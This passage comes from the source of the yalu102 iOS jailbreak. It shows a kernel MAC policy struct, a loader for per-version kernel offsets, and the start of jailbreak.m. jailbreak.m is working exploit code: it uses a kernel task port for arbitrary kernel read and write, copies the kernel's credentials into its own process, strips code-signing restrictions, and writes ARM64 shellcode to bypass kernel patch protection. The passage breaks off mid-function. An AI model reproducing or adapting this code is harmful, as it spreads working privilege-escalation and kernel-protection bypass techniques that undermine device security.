mpo_mount_label_destroy; 133 | uint64_t mpo_mount_label_externalize; 134 | uint64_t mpo_mount_label_init; 135 | uint64_t mpo_mount_label_internalize; 136 | uint64_t mpo_netinet_fragment; 137 | uint64_t mpo_netinet_icmp_reply; 138 | uint64_t mpo_netinet_tcp_reply; 139 | uint64_t mpo_pipe_check_ioctl; 140 | uint64_t mpo_pipe_check_kqfilter; 141 | uint64_t mpo_pipe_check_label_update; 142 | uint64_t mpo_pipe_check_read; 143 | uint64_t mpo_pipe_check_select; 144 | uint64_t mpo_pipe_check_stat; 145 | uint64_t mpo_pipe_check_write; 146 | uint64_t mpo_pipe_label_associate; 147 | uint64_t mpo_pipe_label_copy; 148 | uint64_t mpo_pipe_label_destroy; 149 | uint64_t mpo_pipe_label_externalize; 150 | uint64_t mpo_pipe_label_init; 151 | uint64_t mpo_pipe_label_internalize; 152 | uint64_t mpo_pipe_label_update; 153 | uint64_t mpo_policy_destroy; 154 | uint64_t mpo_policy_init; 155 | uint64_t mpo_policy_initbsd; 156 | uint64_t mpo_policy_syscall; 157 | uint64_t mpo_system_check_sysctlbyname; 158 | uint64_t mpo_proc_check_inherit_ipc_ports; 159 | uint64_t mpo_vnode_check_rename; 160 | uint64_t mpo_kext_check_query; 161 | uint64_t mpo_iokit_check_nvram_get; 162 | uint64_t mpo_iokit_check_nvram_set; 163 | uint64_t mpo_iokit_check_nvram_delete; 164 | uint64_t mpo_proc_check_expose_task; 165 | uint64_t mpo_proc_check_set_host_special_port; 166 | uint64_t mpo_proc_check_set_host_exception_port; 167 | uint64_t mpo_exc_action_check_exception_send; 168 | uint64_t mpo_exc_action_label_associate; 169 | uint64_t mpo_exc_action_label_copy; 170 | uint64_t mpo_exc_action_label_destroy; 171 | uint64_t mpo_exc_action_label_init; 172 | uint64_t mpo_exc_action_label_update; 173 | uint64_t mpo_reserved1; 174 | uint64_t mpo_reserved2; 175 | uint64_t mpo_reserved3; 176 | uint64_t mpo_reserved4; 177 | uint64_t mpo_reserved5; 178 | uint64_t mpo_reserved6; 179 | uint64_t mpo_posixsem_check_create; 180 | uint64_t mpo_posixsem_check_open; 181 | uint64_t mpo_posixsem_check_post; 182 | uint64_t mpo_posixsem_check_unlink; 183 | uint64_t mpo_posixsem_check_wait; 184 | uint64_t mpo_posixsem_label_associate; 185 | uint64_t mpo_posixsem_label_destroy; 186 | uint64_t mpo_posixsem_label_init; 187 | uint64_t mpo_posixshm_check_create; 188 | uint64_t mpo_posixshm_check_mmap; 189 | uint64_t mpo_posixshm_check_open; 190 | uint64_t mpo_posixshm_check_stat; 191 | uint64_t mpo_posixshm_check_truncate; 192 | uint64_t mpo_posixshm_check_unlink; 193 | uint64_t mpo_posixshm_label_associate; 194 | uint64_t mpo_posixshm_label_destroy; 195 | uint64_t mpo_posixshm_label_init; 196 | uint64_t mpo_proc_check_debug; 197 | uint64_t mpo_proc_check_fork; 198 | uint64_t mpo_proc_check_get_task_name; 199 | uint64_t mpo_proc_check_get_task; 200 | uint64_t mpo_proc_check_getaudit; 201 | uint64_t mpo_proc_check_getauid; 202 | uint64_t mpo_proc_check_getlcid; 203 | uint64_t mpo_proc_check_mprotect; 204 | uint64_t mpo_proc_check_sched; 205 | uint64_t mpo_proc_check_setaudit; 206 | uint64_t mpo_proc_check_setauid; 207 | uint64_t mpo_proc_check_setlcid; 208 | uint64_t mpo_proc_check_signal; 209 | uint64_t mpo_proc_check_wait; 210 | uint64_t mpo_proc_label_destroy; 211 | uint64_t mpo_proc_label_init; 212 | uint64_t mpo_socket_check_accept; 213 | uint64_t mpo_socket_check_accepted; 214 | uint64_t mpo_socket_check_bind; 215 | uint64_t mpo_socket_check_connect; 216 | uint64_t mpo_socket_check_create; 217 | uint64_t mpo_socket_check_deliver; 218 | uint64_t mpo_socket_check_kqfilter; 219 | uint64_t mpo_socket_check_label_update; 220 | uint64_t mpo_socket_check_listen; 221 | uint64_t mpo_socket_check_receive; 222 | uint64_t mpo_socket_check_received; 223 | uint64_t mpo_socket_check_select; 224 | uint64_t mpo_socket_check_send; 225 | uint64_t mpo_socket_check_stat; 226 | uint64_t mpo_socket_check_setsockopt; 227 | uint64_t mpo_socket_check_getsockopt; 228 | uint64_t mpo_socket_label_associate_accept; 229 | uint64_t mpo_socket_label_associate; 230 | uint64_t mpo_socket_label_copy; 231 | uint64_t mpo_socket_label_destroy; 232 | uint64_t mpo_socket_label_externalize; 233 | uint64_t mpo_socket_label_init; 234 | uint64_t mpo_socket_label_internalize; 235 | uint64_t mpo_socket_label_update; 236 | uint64_t mpo_socketpeer_label_associate_mbuf; 237 | uint64_t mpo_socketpeer_label_associate_socket; 238 | uint64_t mpo_socketpeer_label_destroy; 239 | uint64_t mpo_socketpeer_label_externalize; 240 | uint64_t mpo_socketpeer_label_init; 241 | uint64_t mpo_system_check_acct; 242 | uint64_t mpo_system_check_audit; 243 | uint64_t mpo_system_check_auditctl; 244 | uint64_t mpo_system_check_auditon; 245 | uint64_t mpo_system_check_host_priv; 246 | uint64_t mpo_system_check_nfsd; 247 | uint64_t mpo_system_check_reboot; 248 | uint64_t mpo_system_check_settime; 249 | uint64_t mpo_system_check_swapoff; 250 | uint64_t mpo_system_check_swapon; 251 | uint64_t mpo_reserved7; 252 | uint64_t mpo_sysvmsg_label_associate; 253 | uint64_t mpo_sysvmsg_label_destroy; 254 | uint64_t mpo_sysvmsg_label_init; 255 | uint64_t mpo_sysvmsg_label_recycle; 256 | uint64_t mpo_sysvmsq_check_enqueue; 257 | uint64_t mpo_sysvmsq_check_msgrcv; 258 | uint64_t mpo_sysvmsq_check_msgrmid; 259 | uint64_t mpo_sysvmsq_check_msqctl; 260 | uint64_t mpo_sysvmsq_check_msqget; 261 | uint64_t mpo_sysvmsq_check_msqrcv; 262 | uint64_t mpo_sysvmsq_check_msqsnd; 263 | uint64_t mpo_sysvmsq_label_associate; 264 | uint64_t mpo_sysvmsq_label_destroy; 265 | uint64_t mpo_sysvmsq_label_init; 266 | uint64_t mpo_sysvmsq_label_recycle; 267 | uint64_t mpo_sysvsem_check_semctl; 268 | uint64_t mpo_sysvsem_check_semget; 269 | uint64_t mpo_sysvsem_check_semop; 270 | uint64_t mpo_sysvsem_label_associate; 271 | uint64_t mpo_sysvsem_label_destroy; 272 | uint64_t mpo_sysvsem_label_init; 273 | uint64_t mpo_sysvsem_label_recycle; 274 | uint64_t mpo_sysvshm_check_shmat; 275 | uint64_t mpo_sysvshm_check_shmctl; 276 | uint64_t mpo_sysvshm_check_shmdt; 277 | uint64_t mpo_sysvshm_check_shmget; 278 | uint64_t mpo_sysvshm_label_associate; 279 | uint64_t mpo_sysvshm_label_destroy; 280 | uint64_t mpo_sysvshm_label_init; 281 | uint64_t mpo_sysvshm_label_recycle; 282 | uint64_t mpo_reserved8; 283 | uint64_t mpo_reserved9; 284 | uint64_t mpo_vnode_check_getattr; 285 | uint64_t mpo_mount_check_snapshot_create; 286 | uint64_t mpo_mount_check_snapshot_delete; 287 | uint64_t mpo_vnode_check_clone; 288 | uint64_t mpo_proc_check_get_cs_info; 289 | uint64_t mpo_proc_check_set_cs_info; 290 | uint64_t mpo_iokit_check_hid_control; 291 | uint64_t mpo_vnode_check_access; 292 | uint64_t mpo_vnode_check_chdir; 293 | uint64_t mpo_vnode_check_chroot; 294 | uint64_t mpo_vnode_check_create; 295 | uint64_t mpo_vnode_check_deleteextattr; 296 | uint64_t mpo_vnode_check_exchangedata; 297 | uint64_t mpo_vnode_check_exec; 298 | uint64_t mpo_vnode_check_getattrlist; 299 | uint64_t mpo_vnode_check_getextattr; 300 | uint64_t mpo_vnode_check_ioctl; 301 | uint64_t mpo_vnode_check_kqfilter; 302 | uint64_t mpo_vnode_check_label_update; 303 | uint64_t mpo_vnode_check_link; 304 | uint64_t mpo_vnode_check_listextattr; 305 | uint64_t mpo_vnode_check_lookup; 306 | uint64_t mpo_vnode_check_open; 307 | uint64_t mpo_vnode_check_read; 308 | uint64_t mpo_vnode_check_readdir; 309 | uint64_t mpo_vnode_check_readlink; 310 | uint64_t mpo_vnode_check_rename_from; 311 | uint64_t mpo_vnode_check_rename_to; 312 | uint64_t mpo_vnode_check_revoke; 313 | uint64_t mpo_vnode_check_select; 314 | uint64_t mpo_vnode_check_setattrlist; 315 | uint64_t mpo_vnode_check_setextattr; 316 | uint64_t mpo_vnode_check_setflags; 317 | uint64_t mpo_vnode_check_setmode; 318 | uint64_t mpo_vnode_check_setowner; 319 | uint64_t mpo_vnode_check_setutimes; 320 | uint64_t mpo_vnode_check_stat; 321 | uint64_t mpo_vnode_check_truncate; 322 | uint64_t mpo_vnode_check_unlink; 323 | uint64_t mpo_vnode_check_write; 324 | uint64_t mpo_vnode_label_associate_devfs; 325 | uint64_t mpo_vnode_label_associate_extattr; 326 | uint64_t mpo_vnode_label_associate_file; 327 | uint64_t mpo_vnode_label_associate_pipe; 328 | uint64_t mpo_vnode_label_associate_posixsem; 329 | uint64_t mpo_vnode_label_associate_posixshm; 330 | uint64_t mpo_vnode_label_associate_singlelabel; 331 | uint64_t mpo_vnode_label_associate_socket; 332 | uint64_t mpo_vnode_label_copy; 333 | uint64_t mpo_vnode_label_destroy; 334 | uint64_t mpo_vnode_label_externalize_audit; 335 | uint64_t mpo_vnode_label_externalize; 336 | uint64_t mpo_vnode_label_init; 337 | uint64_t mpo_vnode_label_internalize; 338 | uint64_t mpo_vnode_label_recycle; 339 | uint64_t mpo_vnode_label_store; 340 | uint64_t mpo_vnode_label_update_extattr; 341 | uint64_t mpo_vnode_label_update; 342 | uint64_t mpo_vnode_notify_create; 343 | uint64_t mpo_vnode_check_signature; 344 | uint64_t mpo_vnode_check_uipc_bind; 345 | uint64_t mpo_vnode_check_uipc_connect; 346 | uint64_t mpo_proc_check_run_cs_invalid; 347 | uint64_t mpo_proc_check_suspend_resume; 348 | uint64_t mpo_thread_userret; 349 | uint64_t mpo_iokit_check_set_properties; 350 | uint64_t mpo_system_check_chud; 351 | uint64_t mpo_vnode_check_searchfs; 352 | uint64_t mpo_priv_check; 353 | uint64_t mpo_priv_grant; 354 | uint64_t mpo_proc_check_map_anon; 355 | uint64_t mpo_vnode_check_fsgetpath; 356 | uint64_t mpo_iokit_check_open; 357 | uint64_t mpo_proc_check_ledger; 358 | uint64_t mpo_vnode_notify_rename; 359 | uint64_t mpo_vnode_check_setacl; 360 | uint64_t mpo_vnode_notify_deleteextattr; 361 | uint64_t mpo_system_check_kas_info; 362 | uint64_t mpo_proc_check_cpumon; 363 | uint64_t mpo_vnode_notify_open; 364 | uint64_t mpo_system_check_info; 365 | uint64_t mpo_pty_notify_grant; 366 | uint64_t mpo_pty_notify_close; 367 | uint64_t mpo_vnode_find_sigs; 368 | uint64_t mpo_kext_check_load; 369 | uint64_t mpo_kext_check_unload; 370 | uint64_t mpo_proc_check_proc_info; 371 | uint64_t mpo_vnode_notify_link; 372 | uint64_t mpo_iokit_check_filter_properties; 373 | uint64_t mpo_iokit_check_get_property; 374 | }; 375 | 376 | 377 | 378 | #endif /* devicesupport_h */ 379 | -------------------------------------------------------------------------------- /SourceCode/yalu102/devicesupport.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "devicesupport.h" 3 | #import 4 | #import 5 | 6 | 7 | NSMutableArray* consttable = nil; 8 | NSMutableArray* collide = nil; 9 | int constload() { 10 | struct utsname uts; 11 | uname(&uts); 12 | if (strstr(uts.version, "Marijuan")) { 13 | return -2; 14 | } 15 | 16 | NSString* strv = [NSString stringWithUTF8String:uts.version]; 17 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 18 | int m = 0; 19 | collide = [NSMutableArray new]; 20 | 21 | for (NSDictionary* dict in dp) { 22 | if ([dict[@"vers"] isEqualToString:strv]) { 23 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 24 | int i = 0; 25 | for (NSString* str in dict[@"val"]) { 26 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 27 | i++; 28 | } 29 | m++; 30 | } 31 | } 32 | if (m) { 33 | return 0; 34 | } 35 | return -1; 36 | } 37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid) 38 | { 39 | for (NSArray* arr in collide) { 40 | if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 41 | NSLog(@"affined"); 42 | consttable = arr; 43 | return 0; 44 | } 45 | } 46 | return -1; 47 | } 48 | uint64_t constget(int idx){ 49 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 50 | } 51 | -------------------------------------------------------------------------------- /SourceCode/yalu102/iokitmig64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/iokitmig64.o -------------------------------------------------------------------------------- /SourceCode/yalu102/jailbreak.m: -------------------------------------------------------------------------------- 1 | // 2 | // jailbreak.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 07/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 11 | #import 12 | #import "devicesupport.h" 13 | 14 | #import "IOKit/IOKitLib.h" 15 | #import 16 | #import 17 | #import 18 | #import 19 | #import 20 | 21 | #import "devicesupport.h" 22 | #import 23 | #import 24 | #import 25 | #import 26 | #import 27 | #import 28 | #import 29 | 30 | #import "patchfinder64.h" 31 | 32 | #define vm_address_t mach_vm_address_t 33 | 34 | mach_port_t tfp0=0; 35 | uint64_t slide=0; 36 | io_connect_t funcconn=0; 37 | // #define NSLog(...) 38 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 39 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 40 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 41 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 42 | 43 | uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) 44 | { 45 | return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr); 46 | } 47 | 48 | void copyin(void* to, uint64_t from, size_t size) { 49 | mach_vm_size_t outsize = size; 50 | size_t szt = size; 51 | if (size > 0x1000) { 52 | size = 0x1000; 53 | } 54 | size_t off = 0; 55 | while (1) { 56 | mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize); 57 | szt -= size; 58 | off += size; 59 | if (szt == 0) { 60 | break; 61 | } 62 | size = szt; 63 | if (size > 0x1000) { 64 | size = 0x1000; 65 | } 66 | 67 | } 68 | } 69 | 70 | void copyout(uint64_t to, void* from, size_t size) { 71 | mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size); 72 | } 73 | 74 | uint64_t ReadAnywhere64(uint64_t addr) { 75 | uint64_t val = 0; 76 | copyin(&val, addr, 8); 77 | return val; 78 | } 79 | 80 | uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) { 81 | copyout(addr, &val, 8); 82 | return val; 83 | } 84 | 85 | uint32_t ReadAnywhere32(uint64_t addr) { 86 | uint32_t val = 0; 87 | copyin(&val, addr, 4); 88 | return val; 89 | } 90 | 91 | uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { 92 | copyout(addr, &val, 4); 93 | return val; 94 | } 95 | 96 | #import "pte_stuff.h" 97 | 98 | void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) 99 | { 100 | io_iterator_t iterator; 101 | IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); 102 | io_object_t servicex = IOIteratorNext(iterator); 103 | funcconn = 0; 104 | IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); 105 | assert(funcconn); 106 | 107 | tfp0 = pt; 108 | 109 | uint64_t bsd_task=0; 110 | uint64_t launchd_task = 0; 111 | { 112 | uint64_t proc = ReadAnywhere64(allprocs+kernbase); 113 | NSLog(@"found procs at %llx", proc); 114 | while (proc) { 115 | uint32_t pid = ReadAnywhere32(proc+0x10); 116 | if (pid == getpid()) { 117 | bsd_task = proc; 118 | } else 119 | if (pid == 1) { 120 | launchd_task = proc; 121 | } 122 | 123 | if (launchd_task && bsd_task) break; 124 | 125 | proc = ReadAnywhere64(proc); 126 | } 127 | } 128 | uint64_t cred = ReadAnywhere64(bsd_task+0x100); 129 | 130 | uint64_t credpatch = 0; 131 | uint64_t proc = bsd_task; 132 | while (proc) { 133 | uint32_t pid = ReadAnywhere32(proc+0x10); 134 | uint32_t csflags = ReadAnywhere32(proc+0x2a8); 135 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW; 136 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 137 | WriteAnywhere32(proc+0x2a8, csflags); 138 | if (pid == 0) { 139 | credpatch = ReadAnywhere64(proc+0x100); 140 | break; 141 | } 142 | proc = ReadAnywhere64(proc); 143 | } 144 | 145 | uint64_t orig_cred = cred; 146 | 147 | WriteAnywhere64(bsd_task+0x100, credpatch); 148 | 149 | checkvad(); 150 | 151 | vm_address_t vmd = 0; 152 | _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE); 153 | 154 | copyin((void*)vmd, kernbase, 0x4000); 155 | 156 | struct mach_header_64* vmk = vmd; 157 | uint64_t max = 0; 158 | uint64_t min = -1; 159 | 160 | struct load_command* lc = vmk+1; 161 | for (int k=0; k < vmk->ncmds; k++) { 162 | 163 | if (lc->cmd == LC_SEGMENT_64) { 164 | struct segment_command_64* sg = lc; 165 | NSLog(@"seg: %s", sg->segname); 166 | if (sg->vmaddr < min) { 167 | min = sg->vmaddr; 168 | } 169 | if (sg->vmaddr + sg->vmsize > max) { 170 | max = sg->vmaddr+sg->vmsize; 171 | } 172 | } 173 | 174 | lc = ((char*)lc) + lc->cmdsize; 175 | } 176 | 177 | NSLog(@"%llx - %llx", min, max); 178 | 179 | char* kdump = malloc(max-min); 180 | 181 | for (int k=0; k < (max-min)/0x4000; k++) { 182 | copyin(kdump+k*0x4000, min+k*0x4000, 0x4000); 183 | } 184 | 185 | NSLog(@"%llx", kdump); 186 | uint64_t kerndumpsize = 0; 187 | uint64_t gadget_base = 0; 188 | uint64_t gadget_size = 0; 189 | uint64_t prelink_base = 0; 190 | uint64_t prelink_size = 0; 191 | uint64_t kerndumpbase = -1; 192 | 193 | 194 | struct mach_header_64* mh_kern = (struct mach_header_64*) (kdump+kernbase-min); 195 | struct load_command* load_cmd = (struct load_command*)(mh_kern+1); 196 | 197 | uint64_t entryp = 0; 198 | 199 | for (int i = 0; i < mh_kern->ncmds; i++) { 200 | 201 | if (load_cmd->cmd == LC_SEGMENT_64) { 202 | struct segment_command_64* seg = (struct segment_command_64*)load_cmd; 203 | //NSLog(@"found segment %s", seg->segname); 204 | 205 | if (strcmp(seg->segname, "__TEXT_EXEC") == 0) { 206 | gadget_base = seg->vmaddr; 207 | gadget_size = seg->filesize; 208 | } 209 | if (strcmp(seg->segname, "__PLK_TEXT_EXEC") == 0) { 210 | prelink_base = seg->vmaddr; 211 | prelink_size = seg->filesize; 212 | } 213 | 214 | if (seg->vmaddr < kerndumpbase) { 215 | kerndumpbase = seg->vmaddr; 216 | } 217 | kerndumpsize += seg->vmsize; 218 | } else if (load_cmd->cmd == LC_UNIXTHREAD) { 219 | struct { 220 | unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ 221 | unsigned long cmdsize; /* total size of this command */ 222 | unsigned long flavor; /* flavor of thread state */ 223 | unsigned long count; /* count of longs in thread state */ 224 | struct { 225 | __uint64_t __x[29]; /* General purpose registers x0-x28 */ 226 | __uint64_t __fp; /* Frame pointer x29 */ 227 | __uint64_t __lr; /* Link register x30 */ 228 | __uint64_t __sp; /* Stack pointer x31 */ 229 | __uint64_t __pc; /* Program counter */ 230 | __uint32_t __cpsr; /* Current program status register */ 231 | __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ 232 | } state; 233 | } * thr = load_cmd; 234 | entryp = thr->state.__pc; 235 | } 236 | 237 | load_cmd = (struct load_command*)(load_cmd->cmdsize + (vm_address_t)(load_cmd)); 238 | } 239 | set_dump(kerndumpbase, kerndumpsize, (uint8_t*)kdump); 240 | set_text_exec(gadget_base, gadget_size); 241 | set_prelink_exec(prelink_base, prelink_size); 242 | 243 | uint64_t gStoreBase = find_gPhysBase(); 244 | 245 | gPhysBase = ReadAnywhere64(gStoreBase); 246 | gVirtBase = ReadAnywhere64(gStoreBase+8); 247 | 248 | entryp += slide; 249 | uint64_t rvbar = entryp & (~0xFFF); 250 | 251 | uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); 252 | 253 | uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); 254 | if (uref) { 255 | optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; 256 | } 257 | NSLog(@"%llx", optr); 258 | 259 | uint64_t cpu_list = ReadAnywhere64(cpul - 0x10 /*the add 0x10, 0x10 instruction confuses findregval*/) - gPhysBase + gVirtBase; 260 | uint64_t cpu = ReadAnywhere64(cpu_list); 261 | 262 | uint64_t pmap_store = find_kernel_pmap(); 263 | NSLog(@"pmap: %llx", pmap_store); 264 | level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); 265 | 266 | 267 | 268 | 269 | uint64_t shellcode = physalloc(0x4000); 270 | 271 | /* 272 | ldr x30, a 273 | ldr x0, b 274 | br x0 275 | nop 276 | a: 277 | .quad 0 278 | b: 279 | .quad 0 280 | none of that squad shit tho, straight gang shit. free rondonumbanine 281 | */ 282 | 283 | WriteAnywhere32(shellcode + 0x100, 0x5800009e); /* trampoline for idlesleep */ 284 | WriteAnywhere32(shellcode + 0x100 + 4, 0x580000a0); 285 | WriteAnywhere32(shellcode + 0x100 + 8, 0xd61f0000); 286 | 287 | WriteAnywhere32(shellcode + 0x200, 0x5800009e); /* trampoline for deepsleep */ 288 | WriteAnywhere32(shellcode + 0x200 + 4, 0x580000a0); 289 | WriteAnywhere32(shellcode + 0x200 + 8, 0xd61f0000); 290 | 291 | char buf[0x100]; 292 | copyin(buf, optr, 0x100); 293 | copyout(shellcode+0x300, buf, 0x100); 294 | 295 | uint64_t physcode = findphys_real(shellcode); 296 | 297 | 298 | 299 | NSLog(@"got phys at %llx for virt %llx", physcode, shellcode); 300 | 301 | uint64_t idlesleep_handler = 0; 302 | 303 | uint64_t plist[12]={0,0,0,0,0,0,0,0,0,0,0,0}; 304 | int z = 0; 305 | 306 | int idx = 0; 307 | int ridx = 0; 308 | while (cpu) { 309 | cpu = cpu - gPhysBase + gVirtBase; 310 | if ((ReadAnywhere64(cpu+0x130) & 0x3FFF) == 0x100) { 311 | NSLog(@"already jailbroken, bailing out"); 312 | return; 313 | } 314 | 315 | 316 | if (!idlesleep_handler) { 317 | WriteAnywhere64(shellcode + 0x100 + 0x18, ReadAnywhere64(cpu+0x130)); // idlehandler 318 | WriteAnywhere64(shellcode + 0x200 + 0x18, ReadAnywhere64(cpu+0x130) + 12); // deephandler 319 | 320 | idlesleep_handler = ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase; 321 | 322 | 323 | uint32_t* opcz = malloc(0x1000); 324 | copyin(opcz, idlesleep_handler, 0x1000); 325 | idx = 0; 326 | while (1) { 327 | if (opcz[idx] == 0xd61f0000 /* br x0 */) { 328 | break; 329 | } 330 | idx++; 331 | } 332 | ridx = idx; 333 | while (1) { 334 | if (opcz[ridx] == 0xd65f03c0 /* ret */) { 335 | break; 336 | } 337 | ridx++; 338 | } 339 | 340 | 341 | } 342 | 343 | NSLog(@"found cpu %x", ReadAnywhere32(cpu+0x330)); 344 | NSLog(@"found physz: %llx", ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase); 345 | 346 | plist[z++] = cpu+0x130; 347 | cpu_list += 0x10; 348 | cpu = ReadAnywhere64(cpu_list); 349 | } 350 | 351 | 352 | uint64_t shc = physalloc(0x4000); 353 | 354 | uint64_t regi = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+12-gadget_base, text_exec_base, 30); 355 | uint64_t regd = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+24-gadget_base, text_exec_base, 30); 356 | 357 | NSLog(@"%llx - %llx", regi, regd); 358 | 359 | for (int i = 0; i < 0x500/4; i++) { 360 | WriteAnywhere32(shc+i*4, 0xd503201f); 361 | } 362 | 363 | /* 364 | isvad 0 == 0x4000 365 | */ 366 | 367 | uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); 368 | 369 | uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1); 370 | 371 | NSLog(@"ttbr0: %llx %llx",ReadAnywhere64(ttbr0_real), ttbr0_real); 372 | 373 | char* bbuf = malloc(0x4000); 374 | copyin(bbuf, ReadAnywhere64(ttbr0_real) - gPhysBase + gVirtBase, isvad == 0 ? 0x4000 : 0x1000); 375 | copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); 376 | 377 | uint64_t physp = findphys_real(level0_pte); 378 | 379 | 380 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 381 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 382 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 383 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 384 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 385 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 386 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 387 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 388 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 389 | WriteAnywhere64(shc+40, regi); 390 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 391 | 392 | shc+=0x100; 393 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 394 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 395 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 396 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 397 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 398 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 399 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 400 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 401 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 402 | WriteAnywhere64(shc+40, regd); /*handle deepsleep*/ 403 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 404 | shc-=0x100; 405 | { 406 | int n = 0; 407 | WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28 408 | WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23] 409 | WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr 410 | WriteAnywhere32(shc+0x200+n, 0xd10103bf); n+=4; // sub sp, x29, #64 411 | WriteAnywhere32(shc+0x200+n, 0xa9447bfd); n+=4; // ldp x29, x30, [sp, #64] 412 | WriteAnywhere32(shc+0x200+n, 0xa9434ff4); n+=4; // ldp x20, x19, [sp, #48] 413 | WriteAnywhere32(shc+0x200+n, 0xa94257f6); n+=4; // ldp x22, x21, [sp, #32] 414 | WriteAnywhere32(shc+0x200+n, 0xa9415ff8); n+=4; // ldp x24, x23, [sp, #16] 415 | WriteAnywhere32(shc+0x200+n, 0xa8c567fa); n+=4; // ldp x26, x25, [sp], #80 416 | WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret 417 | WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0 418 | 419 | } 420 | 421 | mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 422 | 423 | vm_address_t kppsh = 0; 424 | mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); 425 | 426 | { 427 | int n = 0; 428 | 429 | WriteAnywhere32(kppsh+n, 0x580001e1); n+=4; // ldr x1, #60 430 | WriteAnywhere32(kppsh+n, 0x58000140); n+=4; // ldr x0, #40 431 | WriteAnywhere32(kppsh+n, 0xd5182020); n+=4; // msr TTBR1_EL1, x0 432 | WriteAnywhere32(kppsh+n, 0xd2a00600); n+=4; // movz x0, #0x30, lsl #16 433 | WriteAnywhere32(kppsh+n, 0xd5181040); n+=4; // msr CPACR_EL1, x0 434 | WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 435 | WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 436 | WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop 437 | WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) 438 | 